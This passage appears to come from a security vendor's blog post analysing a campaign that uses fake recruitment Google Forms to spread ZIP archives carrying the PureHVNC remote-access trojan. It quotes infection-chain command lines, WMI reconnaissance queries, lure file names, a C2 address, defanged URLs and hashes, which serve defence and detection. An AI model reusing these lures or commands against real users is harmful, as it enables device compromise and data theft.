    Once installed, it can:

    • Take control of the system and run commands remotely.
    • Collect information about the device, including operating system, hardware, security software, and info about the user and connected devices.
    • Steal data from browsers, extensions and crypto wallets.
    • Extract data from apps like Telegram and Foxmail.
    • Install additional plugins.
    • Achieve persistence in several ways (for example, via scheduled tasks).

    Different lures, same goal: compromise your device

    In our research, we found multiple Google Forms hosting links to malicious ZIP files that start the infection chain. These forms are convincing, impersonating real company names, logos and links. LinkedIn is one of the platforms used to send links to these malicious forms.

    • Fake Google Forms that distribute malicious ZIPs.
    • The attackers impersonate real companies
    • Well-known brands are impersonated to lend credibility

    The forms typically ask for professional information (experience, background, etc.), making them feel like part of a real recruitment or business process.

    • Information requested from the user to make the form appear legitimate.
      Information requested from the user to make the form appear legitimate.
    • Information requested from the user to make the form appear legitimate.
      More information.

    The forms link to ZIP files hosted on:

    • File-sharing services such as Dropbox, filedn.com, and fshare.vn
    • URL shorteners such as tr.ee and goo.su
    • Google redirect links that obscure the final destination

    The ZIP archives use various names and are tied to different business-related themes (marketing, interviews, projects, job offers, budgets, partnerships, benefits) to avoid suspicion, for example:

    • {CompanyName}_GlobalLogistics_Ad_Strategy.zip
    • Project_Information_Summary_2026.zip
    • {CompanyName} Project 2026 Interview Materials.zip
    • {CompanyName}_Company_and_Job_Overview.pdf.rar
    • Collaboration Project with {CompanyName} Company 2026.zip

    The lures use the names of well-known companies, particularly in the financial, logistic, technology, sustainability and energy sectors. Impersonating legitimate organizations add credibility to their campaign.

    What happens after you download the file

    The ZIP archives usually contain legitimate files (such as PDFs of job descriptions) and an executable file along with a DLL, typically named msimg32.dll. The DLL is executed via DLL hijacking (tricking a legitimate program into loading malicious code), although the technique has undergone multiple modifications and upgrades over time.

    Legitimate PDFs are present in some ZIP files, like this one pretending to be a job description from a real company.
    Legitimate PDFs are present in some ZIP files, like this one masquerading as a real job description.

    Analysis of the malicious campaign

    We identified multiple variants of this campaign, each using different methods to extract the archive, distinct Python code, and varying folder structures. Across these variants, the campaign typically includes an executable file along with a DLL hidden in a separate folder. In some cases, attackers also include legitimate files related to the lure’s theme, enhancing the overall credibility of the attack.

    Example of files present in one of the archives analyzed.
    Example of files present in one of the archives analyzed.

    The malicious code is present in the DLL, and carries out various operations, including:

    • Decrypting strings with a simple XOR, in this case with the “4B” key.
    • Detecting debugging and sandboxing with IsDebuggerPresent() and time64(), and displaying the error “This software has expired or debugger detected” if triggered.
    • Deleting itself, then dropping and launching a fake PDF.
    • Achieving persistence via the registry key CurrentVersion\Run\Miroupdate.
    • Extracting the “final.zip” archive and running it.

    In this case, the PDF was started with the following command:

    cmd.exe /c start "" "C:\Users\user\Desktop\Marketing Director Assessment Project\Marketing_Director_Assessment_Project.pdf"

    The PDF opened during the infection chain.
    The PDF opened during the infection chain.

    The archive final.zip is unzipped using different commands across the analyzed campaigns into a random folder under ProgramData. In this example, the tar command is used:

    cmd.exe /c tar -xf "C:\ProgramData\{random folder}\{random folder \final.zip" -C "C:\ProgramData\{random folder \{random folder} " >nul 2>&1

    The zip contains several files associated with Python and the next stage.

    Python files compressed into a random folder in ProgramData.
    Python files compressed into a random folder in ProgramData.

    Next, an obfuscated Python script called config.log is executed. It ultimately decodes and runs a Donut shellcode. This script appears under different names (e.g., image.mp3) and formats in the different chains analyzed.

    "C:\ProgramData\{random folder}\{random folder}\pythonw.exe" "C:\ProgramData\{random folder}\{random folder}\config.log"

    Obfuscated Python script that ultimately loads the Donut shellcode.
    Obfuscated Python script that ultimately loads the Donut shellcode.

    At the end of the infection chain, PureHVNC was injected into SearchUI.exe. The injected process may vary across the analyzed samples.

    PureHVNC executes the following WMI queries to gather information about the compromised device:

    • SELECT * FROM AntiVirusProduct
    • SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
    • SELECT Caption FROM Win32_OperatingSystem

    For persistence, it creates a scheduled task using a base64-PowerShell command, with the flag “-RunLevel Highest” if the user has admin rights.

    PowerShell command for the Scheduled Task

    PureHVNC performs enumeration to exfiltrate information related to various browsers, extensions, and cryptocurrency wallets.

    Methods related to wallet and browser data exfiltration.
    Methods related to wallet and browser data exfiltration.
    Methods related to wallet and browser data exfiltration.

    The malware configuration is encoded with base64 and compressed with GZIP.

    In this case, the configuration includes:

    • C2: 207.148.66.14
    • C2 ports: 56001, 56002, 56003
    • Campaign ID: Default 
    • Sleeping Flag: 0
    • Persistence Path: APPDATA
    • Mutex Name: Rluukgz 

    How to stay safe

    Using Google Forms is a highly effective method for distributing malware. Attackers are relying on trust in familiar tools like Google Forms, Dropbox, and LinkedIn, and impersonating legitimate companies to get past your guard.

    If you deal with job offers, partnerships, or project work online, this is worth paying attention to:

    • Always check the origin of Google Forms, don’t enter sensitive information, and don’t download files unless you fully trust the source.
    • Verify requests through official company channels before engaging.
    • Be wary of links hidden behind URL shorteners or redirects.

    Indicators of Compromise (IOCs)

    IP

    207.148.66.14

    URL

    https://goo[.]su/CmLknt7

    https://www.fshare[.]vn/file/F57BN4BZPC8W

    https://tr[.].ee/R9y0SK

    https://dl.dropbox[.]com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9

    HASH

    ca6bd16a6185c3823603b1ce751915eaa60fb9dcef91f764bef6410d729d60b3

    d6b7ab6e5e46cab2d58eae6b15d06af476e011a0ce8fcb03ba12c0f32b0e6386

    e7b9f608a90bf0c1e477a28f41cb6bd2484b997990018b72a87268bf46708320

    e221bb31e3539381d4753633443c1595bd28821ab6c4a89ad00ea03b2e98aa00

    7f9225a752da4df4ee4066d7937fe169ca9f28ecddffd76aa5151fb72a57d54b

    e0ced0ea7b097d000cb23c0234dc41e864d1008052c4ddaeaea85f81b712d07c

    b18e0d1b1e59f6e61f0dcab62fecebd8bcf4eb6481ff187083ea5fe5e0183f66

    85c07d2935d6626fb96915da177a71d41f3d3a35f7c4b55e5737f64541618d37

    b78514cfd0ba49d3181033d78cb7b7bc54b958f242a4ebcd0a5b39269bdc8357

    fe398eb8dcf40673ba27b21290b4179d63d51749bc20a605ca01c68ee0eaebbc

    1d533963b9148b2671f71d3bee44d8332e429aa9c99eb20063ab9af90901bd4d

    c149158f18321badd71d63409d08c8f4d953d9cd4a832a6baca0f22a2d6a3877

    83ce196489a2b2d18a8b17cd36818f7538128ed08ca230a92d6ee688cf143a6c

    ea4fb511279c1e1fac1829ec2acff7fe194ce887917b9158c3a4ea213abd513a

    59362a21e8266e91f535a2c94f3501c33f97dce0be52c64237eb91150eee33e3

    a92f553c2d430e2f4114cfadc8e3a468e78bdadc7d8fc5112841c0fdb2009b2a

    4957b08665ddbb6a2d7f81bf1d96d252c4d8c1963de228567d6d4c73858803a4

    481360f518d076fc0acb671dc10e954e2c3ae7286278dfe0518da39770484e62

    8d6bc4e1d0c469022947575cbdb2c5dd22d69f092e696f0693a84bc7df5ae5e0

    258adaed24ac6a25000c9c1240bf6834482ef62c22b413614856b8973e11a79f

    Pro tip: This is only a partial list of malicious URLs. Download the Malwarebytes Browser Guard plugin for full protection and to block the remaining malicious domains.


    We don’t just report on threats—we remove them

    Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

    •  
    ❌